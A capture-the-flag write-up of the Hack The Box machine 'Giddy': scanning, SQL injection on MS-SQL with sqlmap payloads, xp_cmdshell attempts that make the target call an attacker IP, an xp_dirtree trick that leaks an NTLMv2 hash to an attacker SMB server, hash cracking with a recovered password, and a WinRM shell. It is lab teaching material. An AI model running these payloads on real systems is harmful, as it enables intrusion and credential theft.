Giddy is a super cool box which gives real-life experience by Bypassing Windows Defender, Applock and Constrained Language Mode. It starts with enumeration leading to a site which is vulnerable to SQL injection on MS-SQL. I’ll abuse SQL-Injection to make giddy a SMB connect to me, through xp_dirtree giving me the NTLM-v2 challenge, which I can crack to get a password for user stacy. I’ll use that password with WinRM service running on giddy. To get system, I’ll exploit a vulnerability in Ubiquiti UniFi Video.
Enumeration
Masscan + Nmap
1
2
3
4
5
6
$ masscan -p1-65535,U:1-65535 `IP` --rate=5000 -e tun0 | tee masscan.out
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Discovered open port 5985/tcp on 10.10.10.104
Parse those ports to nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
$ nmap -v -sVC --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Issuer: commonName=PowerShellWebAccessTestWebSite
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2018-06-16T21:28:55
| Not valid after: 2018-09-14T21:28:55
| MD5: 78a7 4af5 3b09 c882 a149 f977 cf8f 1182
|_SHA-1: 8adc 3379 878a f13f 0154 406a 3ead d345 6967 6a23
|_ssl-date: 2021-08-10T16:50:55+00:00; -1s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2021-08-10T16:50:52+00:00
| ssl-cert: Subject: commonName=Giddy
| Issuer: commonName=Giddy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-03T14:56:04
| Not valid after: 2021-11-02T14:56:04
| MD5: aa42 a9f1 1181 e790 9d59 28dd 7879 5878
|_SHA-1: f5ac fe1b ea5a 81ad a917 c1c2 0087 90a8 1bed 5dc5
|_ssl-date: 2021-08-10T16:50:55+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Since 3389 is Remote Desktop Protocol and 5985 is Windows Remote Management, I’ll just ignore that.
HTTP/S (80,443)
Banner grabbing: Port 80:
1
2
$ nc -v giddy.htb 80
giddy.htb [10.10.10.104] 80 (http) open
Port 443:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
$ openssl s_client -connect giddy.htb:443
CONNECTED(00000003)
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=66:EE certificate key too weak
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
verify error:num=10:certificate has expired
notAfter=Sep 14 21:28:55 2018 GMT
verify return:1
depth=0 CN = PowerShellWebAccessTestWebSite
notAfter=Sep 14 21:28:55 2018 GMT
verify return:1
---
Certificate chain
0 s:CN = PowerShellWebAccessTestWebSite
i:CN = PowerShellWebAccessTestWebSite
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICHTCCAYagAwIBAgIQG2rbVjzfZqJIr005rMK4xTANBgkqhkiG9w0BAQUFADAp
MScwJQYDVQQDDB5Qb3dlclNoZWxsV2ViQWNjZXNzVGVzdFdlYlNpdGUwHhcNMTgw
NjE2MjEyODU1WhcNMTgwOTE0MjEyODU1WjApMScwJQYDVQQDDB5Qb3dlclNoZWxs
V2ViQWNjZXNzVGVzdFdlYlNpdGUwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGB
ALOvHao3JEpJzzBHR9oCc+934QLPu2vRlC7jZAwySPX6v6fkvzsDr7uD50maLVtW
9etn9KVwfmgkYd6YtY+86YCc935s1rppNtNKeVXsG/PM4G+4HdPFf1Ik3Vj6fc1y
w1nx2PLSNvlC74kkc33MA8y//vxqIckSJiHiVa5ZzdR/AgMBAAGjRjBEMBMGA1Ud
JQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBS4T3PavA05OLCMaCa6GqgXsjCoozAO
BgNVHQ8BAf8EBAMCBSAwDQYJKoZIhvcNAQEFBQADgYEAm6FzHooZ+SSLNp9KvPdX
jjFPpf9Jv4j8Ao9qv1RnbwmTE5SSHhusXDOiAIOsErTVdaNa0VRcduMt+H054kfp
1MeoYvKXuXlMLbGe+orEIiVPjC/7cTJIVyfgyhdl5PdtetlZGrspK8h+2QqvxXpF
im+bXy93yFQ6G9tOrzpBmFY=
-----END CERTIFICATE-----
subject=CN = PowerShellWebAccessTestWebSite
issuer=CN = PowerShellWebAccessTestWebSite
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 872 bytes and written 394 bytes
Verification error: certificate has expired
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
Protocol : TLSv1.2
Cipher : ECDHE-RSA-AES256-GCM-SHA384
Session-ID: E03E00009192AECBEB4F462B7D6E9AD8FDFC7978F8219775000A3C3120C717BC
Session-ID-ctx:
Master-Key: 8823643E99E7EDC8CAD9FBB10FAE8266DA757459F13C60D89BF8DA8B365547F981BCA7F7EAD93FBCCD961EC0A38CF6D6
PSK identity: None
PSK identity hint: None
SRP username: None
Start Time: 1628614816
Timeout : 7200 (sec)
Verify return code: 10 (certificate has expired)
Extended master secret: yes
---
read:errno=104
Directory listing:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ ffuf -u http://giddy.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e .txt,.html,.asp,.aspx
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://giddy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
:: Extensions : .txt .html .asp .aspx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
aspnet_client [Status: 301, Size: 154, Words: 9, Lines: 2]
. [Status: 200, Size: 700, Words: 27, Lines: 32]
remote [Status: 302, Size: 157, Words: 6, Lines: 4]
Remote [Status: 302, Size: 157, Words: 6, Lines: 4]
Aspnet_client [Status: 301, Size: 154, Words: 9, Lines: 2]
mvc [Status: 301, Size: 144, Words: 9, Lines: 2]
/aspnet_client gives 403 on visiting, /remote gives a login page. /mvc is a browsable page with many functionalities.
SQL injection on MS-SQL
- I tried registering, logging in, checking cookies If they’re weak, that didn’t work.
- Tried SQL injection on login and register form, that didn’t work.
- Tried SQL injection on the search functionality, that worked!
Running sqlmap:
1
2
3
4
5
6
7
8
9
10
11
12
$ sqlmap -r req --batch --threads 10 -p 'ctl00$MainContent$SearchTerm'
sqlmap identified the following injection point(s) with a total of 492 HTTP(s) requests:
---
Parameter: ctl00$MainContent$SearchTerm (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=++apU0dzA/DhnZFxzvEphcUipEKPCKz6JNBI7JbP0A344TAIw5EKvC4DcFrkjtlEKkS8lqg0YLKiBjxR3b4zwnnJuAua570S/pnA1sFDLWBsn5ek71qcQ8/Y4YcgWQf3FdPOq5IeeAfRAyU/8hhALHhes9lSe5PivOy9BoPbzwrxT5Hq/zv58i0PsVfK8tMV5TxOfzqgjqqln51Ro1CIB7wNnoVie67UfQCP2jGmNirhcJBajDpW9O4VvNK5E+iOb36wVjxDpmqQD4LVLy3fCjCJ3+AjjsCGVu4LeVw/2+N9zW2h6SJQG0u431PXcCyRkKEMKux+uI26kpZ7kymg57eHbd2wPDrGtJOw9OZ4QKdZEb/EDUla9t37beTsx6gXT9wHdwlN+BMuVSCvgKQF58N1TvJgxkbH2sS8R89Aq0NVPHCfhxHH/Q+zBBwKqpQW8s9REyESJZ+SdLLZEUCOZKFii5B/sJewLU8MFH/3nMuje+rP6zefkzruIT0pUMrliGE7EBiKmrbQscjJZ6N8ZqkSjCDNVMuZ3z4rEAKkv74=&__VIEWSTATEGENERATOR=7DDB321F&__EVENTVALIDATION=XFZH5uNbiCOXA1WF2jvUn27EwXr1phpfomQ4ZdIJVmTwl8LhczAHqXKXIrzHpj0xc/7tnrnyaTXWaYNoRpZ4zzOiBqb2PKN+TOS912S7R52cKoSI5MySJLc/sM1bauU3ABH+TCiN4VbMdN5q2BISUkpqaU/h/ylBcSINV7fRv8w=&ctl00$MainContent$SearchTerm=hello';WAITFOR DELAY '0:0:5'--&ctl00$MainContent$Button1=Search
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=++apU0dzA/DhnZFxzvEphcUipEKPCKz6JNBI7JbP0A344TAIw5EKvC4DcFrkjtlEKkS8lqg0YLKiBjxR3b4zwnnJuAua570S/pnA1sFDLWBsn5ek71qcQ8/Y4YcgWQf3FdPOq5IeeAfRAyU/8hhALHhes9lSe5PivOy9BoPbzwrxT5Hq/zv58i0PsVfK8tMV5TxOfzqgjqqln51Ro1CIB7wNnoVie67UfQCP2jGmNirhcJBajDpW9O4VvNK5E+iOb36wVjxDpmqQD4LVLy3fCjCJ3+AjjsCGVu4LeVw/2+N9zW2h6SJQG0u431PXcCyRkKEMKux+uI26kpZ7kymg57eHbd2wPDrGtJOw9OZ4QKdZEb/EDUla9t37beTsx6gXT9wHdwlN+BMuVSCvgKQF58N1TvJgxkbH2sS8R89Aq0NVPHCfhxHH/Q+zBBwKqpQW8s9REyESJZ+SdLLZEUCOZKFii5B/sJewLU8MFH/3nMuje+rP6zefkzruIT0pUMrliGE7EBiKmrbQscjJZ6N8ZqkSjCDNVMuZ3z4rEAKkv74=&__VIEWSTATEGENERATOR=7DDB321F&__EVENTVALIDATION=XFZH5uNbiCOXA1WF2jvUn27EwXr1phpfomQ4ZdIJVmTwl8LhczAHqXKXIrzHpj0xc/7tnrnyaTXWaYNoRpZ4zzOiBqb2PKN+TOS912S7R52cKoSI5MySJLc/sM1bauU3ABH+TCiN4VbMdN5q2BISUkpqaU/h/ylBcSINV7fRv8w=&ctl00$MainContent$SearchTerm=hello' WAITFOR DELAY '0:0:5'-- Xxky&ctl00$MainContent$Button1=Search
---
But here SQLmap wasn’t able to recognize the database. I got another endpoint with SQL injection: http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8 which is at products displayed at homepage.
Running sqlmap on it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ sqlmap -u http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8 -p ProductSubCategoryId --batch --dbs
Parameter: ProductSubCategoryId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ProductSubCategoryId=8 AND 4485=4485
Type: inline query
Title: Generic inline queries
Payload: ProductSubCategoryId=(SELECT CONCAT(CONCAT(CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113),(CASE WHEN (2151=2151) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: ProductSubCategoryId=8 AND 1839 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1839=1839) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113)))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ProductSubCategoryId=8;WAITFOR DELAY '0:0:5'--
Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: ProductSubCategoryId=8 WAITFOR DELAY '0:0:5'
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: ProductSubCategoryId=8 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(117)+CHAR(71)+CHAR(97)+CHAR(109)+CHAR(88)+CHAR(116)+CHAR(87)+CHAR(117)+CHAR(111)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(84)+CHAR(76)+CHAR(101)+CHAR(70)+CHAR(120)+CHAR(66)+CHAR(102)+CHAR(79)+CHAR(86)+CHAR(80)+CHAR(83)+CHAR(118)+CHAR(78)+CHAR(78)+CHAR(105)+CHAR(87)+CHAR(105)+CHAR(85)+CHAR(74)+CHAR(111)+CHAR(88)+CHAR(115)+CHAR(108)+CHAR(69)+CHAR(75)+CHAR(104)+CHAR(65)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KJQS
---
[18:36:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016 or 2019
web application technology: ASP.NET, Microsoft IIS 10.0, ASP.NET 4.0.30319
back-end DBMS: Microsoft SQL Server 2016
[18:36:51] [INFO] fetching database names
available databases [5]:
[*] Injection
[*] master
[*] model
[*] msdb
[*] tempdb
[18:36:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/giddy.htb'
[*] ending @ 18:36:51 /2021-08-11/
Dumping databases
- Path
C:\\tmp\\Injection.bakfrommsdb.1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
Database: msdb Table: backupfile [2 entries] +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+ | file_guid | backup_set_id | filegroup_guid | differential_base_guid | state | drop_lsn | file_size | file_type | page_size | create_lsn | is_present | state_desc | backup_size | file_number | is_readonly | logical_name | physical_name | read_only_lsn | filegroup_name | physical_drive | read_write_lsn | first_media_number | first_family_number | backed_up_page_count | differential_base_lsn | source_file_block_size | +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+ | 40FA46CD-DFA9-40E1-90E5-5BE7CA6783EA | 1 | 00000000-0000-0000-0000-000000000000 | NULL | NULL | NULL | 214958080 | D | 8192 | NULL | True | ONLINE | 9043968 | 1 | NULL | AdventureWorks2012_Data | C:\\Program Files\\Microsoft SQL Server\\MSSQL13.SQLEXPRESS\\MSSQL\\DATA\\\\Injection.mdf | NULL | PRIMARY | C:\\ | NULL | 1 | 1 | 1104 | NULL | 512 | | E16FAF18-F2EA-4BFB-9B8A-7F30D4F87B84 | 1 | NULL | NULL | NULL | NULL | 1835008 | L | NULL | NULL | True | ONLINE | 30720 | 2 | NULL | AdventureWorks2012_Log | C:\\Program Files\\Microsoft SQL Server\\MSSQL13.SQLEXPRESS\\MSSQL\\DATA\\\\Injection.ldf | NULL | NULL | C:\\ | NULL | 1 | 1 | 4 | NULL | 512 | +--------------------------------------+---------------+--------------------------------------+------------------------+-------+----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------------------+-------------------------------------------------------------------------------------------+---------------+----------------+----------------+----------------+--------------------+---------------------+----------------------+-----------------------+------------------------+ Database: msdb Table: backupmediafamily [1 entry] +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+ | media_set_id | media_family_id | mirror | device_type | media_count | logical_device_name | physical_block_size | physical_device_name | family_sequence_number | +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+ | 1 | BC04C265-0000-0000-0000-000000000000 | NULL | 2 | 1 | NULL | 512 | C:\\tmp\\Injection.bak | 1 | +--------------+--------------------------------------+--------+-------------+-------------+---------------------+---------------------+------------------------+------------------------+
Injectiondatabase has a base64 encoded gzip which is ingzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT)format.1 2 3 4 5 6 7 8
Database: Injection Table: __MigrationHistory [1 entry] +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ | MigrationId | Model | ProductVersion | +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ | 202108111233184_InitialCreate | H4sIAAAAAAAEAO1azW7jNhC+F+g7CDq1BdZK0j2kgb0Lr5O0QeN4ESd7DWhpbBOlSFWksvaz9dBH6it09EdLomTJ3sTutr3Z5PCbH84PZ+y//viz/37lM+sZQkkFH9invRPbAu4Kj/LFwI7U/M25/f7dt9/0rzx/ZX3K6X6M6fAklwN7qVRw4TjSXYJPZM+nbiikmKueK3yHeMI5Ozn5yTk9dQAhbMSyrP59xBX1IfmCX0eCuxCoiLCx8IDJbB13pgmqdUd8kAFxYWCPNf5QBnegemPwZyjXkga9SQB8GKll75IoYltDRgkKOAU2t63g7cWjhKkKBV9MA6IoYQ/rAHB/TpiETJ2L4G1XjU7OYo0cwrlQCCf4Xhaxta6o7RVaRa1jsRKNB3auEEoeJjoVqJH+V1iXFnDpYygCCNX6HuYZxjAIGHUTCeMF23Laz2xsGnOuO9Z3qsw1TBPfWC+8DRWib9nWNV2Bdwt8oZb6CsZkla+cnp3b1iOn6Ip4SIURbt9FjJEZA03vbBWgTolDy/ALkbfCJewjkfKzCL1cgg9CMCC8He+OPNNFYsSqeV1XYBRJ27oHlhDEmqbergMhI3rS/mNdh8K/F6zgW1WapwcSLkChpKKFcCqi0K2I3Hc2TtzJtTPUQ3k2rjxTr96ntx6Itb7xvsIwKGt8LO65+Y7Jfw8L4Md/Qxq6JVIhd+9RuTlzjGB4oH4JK8XumoE2SeWlM1CeWFozUJ6qumSgoZTCpYmc9SnoqaHKXnHP6ipweq81BsAbjZiicS5A2Qb2D4adO7DRmdlks7Fvmc+pXU1xE34JDBRYQ1clj7kRkS7xaio8SlRewawIIfD47YRPNqlCQrkyUyjlLg0I66hN5fx+mX7PV0yspZa3unMJKLmH6na8/WMrouWtXGPbrfWdQmiYNRvPKDwBYSVqLmfxDqyqpTs9NQXV9Ia1NvHZ6MRGbDRjbh5Cjbg6BiuwBb1NbDNzFcjbslz1cnbIIVrXJjWNm98hczSA1xrdKZunJsVq19g0bE7aseWdndPQ2vXHJAiw+BVavWzFmqZ93ujNdPeGyk8xHFfW9FVaWs1JiZAsoLKLrFHSaxpKFZtlRuLyOvJ8g6xzIOT8uvR0padyfjD+nGWCrt2vGVNmosngr9EIfpzmYnvANg8xIJIOnTAStj16R4JFPu+cA5tw6xJhEbpLomxGN5u1Ira5W5O7nYpNjSRtXK5Rc8tOs7NL6Tzxum5V27bt5FWNCId2qnKDVATd3iy2I+ZNTx1mfT/ZFbVZ1n0c/3XDqtR8FGFLGwcOJqOEVUk0d13KKiWrn5WP9pGlUU9SEtvK7wxfE2upwE9DbPo7GzEK8XslJxgTTucg1YP4DfDtgeXuvDLe3GP06Ejpsf/c/JE/k9BdktBssV+sr38xFk3TwxlVLVj/j+EO7A11U7YXBy8P0V4Fvk7+73yy+v6fGB81Yy2PKFCtY60DzIg2bdWxpjWNbeGXzam+aAi0pRv5OqY+Rxf8QFMeswd+hSlP+g7CoJ0J9Mk0WONdqVvrXYZB2oPb50CtjJumLUcdGVVt22mMsz0RbOnLXmUcZL6Z0XMLfwbA8JN0sYGI/xrAwS35rKa54XORh1FFopzEqEmKYIUgw1DROXEVbrsgZfIrzCfCIiS5wiD0bvgkUkGkUGUMSrYuGiMOwW38k5lXWeb+JEh+HnkJFVBMGhe5Cf8QUeZpua9rHoENEHFs/wy4nt4lpgoFi7VGuhO8I1BmPp2SHsAPGILJCZ+SZ2iWrd2GZYv1LylZhMSXGcbmPH5F9/P81bu/AeTZWszOIgAA | 5.0.0.net45 | +-------------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+
Dumping the gzip file with -a for ascii text mode and then -c to print the output on stdout. Doesn’t give anything interesting.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ gzip -adc abc.gzip
<?xml version="1.0" encoding="utf-8"?>
<Edmx Version="3.0" xmlns="http://schemas.microsoft.com/ado/2009/11/edmx">
<Runtime>
<ConceptualModels>
<Schema Namespace="Microsoft.AspNet.Membership.OpenAuth.Data" Alias="Self" p4:UseStrongSpatialTypes="false" xmlns:p4="http://schemas.microsoft.com/ado/2009/02/edm/annotation" xmlns="http://schemas.microsoft.com/ado/2009/11/edm">
<EntityType Name="OpenAuthUserData">
<Key>
<PropertyRef Name="ApplicationName" />
<PropertyRef Name="MembershipUserName" />
</Key>
<Property Name="ApplicationName" Type="String" FixedLength="false" MaxLength="128" Unicode="true" Nullable="false" />
. . . . . . . .
. . . . . . . .
. . . . . . . .
<Designer>
<Connection>
<DesignerInfoPropertySet>
<DesignerProperty Name="MetadataArtifactProcessing" Value="EmbedInOutputAssembly" />
</DesignerInfoPropertySet>
</Connection>
<Options>
<DesignerInfoPropertySet>
<DesignerProperty Name="ValidateOnBuild" Value="False" />
<DesignerProperty Name="CodeGenerationStrategy" Value="None" />
<DesignerProperty Name="ProcessDependentTemplatesOnSave" Value="False" />
</DesignerInfoPropertySet>
</Options>
<Diagrams />
</Designer>
Overall got nothing interesting.
xp_dirtree - NTLMv2 Hash leak
Since the MS-SQL server was also vulnerable to stack queries: Microsoft SQL Server/Sybase stacked queries. That means, I can just append queries at the end.
Basic Enumeration
Since, I cannot get output of any command (Blind injection). I cannot get the permissions I have. Cannot check if I’m the DBA or not, privileges I have etc.
FYI Check current user is admin or not:
1
select name,sysadmin from syslogin;
Current user’s permissions:
1
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
xp_cmdshell (FAIL)
Let’s jump straight to
xp_cmdshellPayload used:8;exec xp_cmdshell 'powershell iwr http://10.10.14.6' --Didn’t work. Maybe xp_cmdshell isn’t enabled.Enabling
xp_cmdshell:1 2 3 4 5 6
-- this turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE -- this enables xp_cmdshell sp_configure 'xp_cmdshell', '1' RECONFIGURE
Payload used:
1
8;exec sp_configure 'show advanced options','1';RECONFIGURE; exec sp_configure 'xp_cmdshell','1';RECONFIGURE; exec xp_cmdshell 'powershell iwr http://10.10.14.6';--
Didn’t work. We aren’t DBA.
xp_dirtree
This will display a list of every folder, every subfolder, and every file for path you give it. BUT I can extract the NTLM hash of the user making the service authentication. For that start a SMB server to capture the hash used in the authentication (impacket-smbserver or responder for example). Payload: 8;exec xp_dirtree '\\10.10.14.6';-- URL: http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=8;exec%20xp_dirtree%20%27\\10.10.14.6\share\file%27--;
SMBServer received:
1
2
3
4
5
6
7
8
9
10
11
12
13
$ smbserver.py share .
Impacket v0.9.22.dev1+20200819.170651.b5fa089b - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.104,49720)
[*] AUTHENTICATE_MESSAGE (GIDDY\Stacy,GIDDY)
[*] User GIDDY\Stacy authenticated successfully
[*] Stacy::GIDDY:4141414141414141:d1a8bea31d3e8b7daeea4ea8957b541a:010100000000000080dac0875290d701038979ba18ae513300000000010010006800720054004a0043007100670066000200100065004c0077004d005a0045004b004e00030010006800720054004a0043007100670066000400100065004c0077004d005a0045004b004e000700080080dac0875290d701060004000200000008003000300000000000000000000000003000005e123cf532680873906dfa81aa6d95564bb9b1473c76c48a747a17f48fa917990a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e003600000000000000000000000000
Cracking the hash with john:
1
2
3
4
5
6
7
8
9
$ john hash -w:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xNnWo6272k7x (Stacy)
1g 0:00:00:02 DONE (2021-08-12 16:28) 0.3703g/s 995934p/s 995934c/s 995934C/s xabeoild1..x997ptw=
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Trying to get a shell with the creds on WinRM:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ evil-winrm -i giddy.htb -u stacy -p xNnWo6272k7x
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========== =============================================
giddy\stacy S-1-5-21-537587684-3058778966-1023884943-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
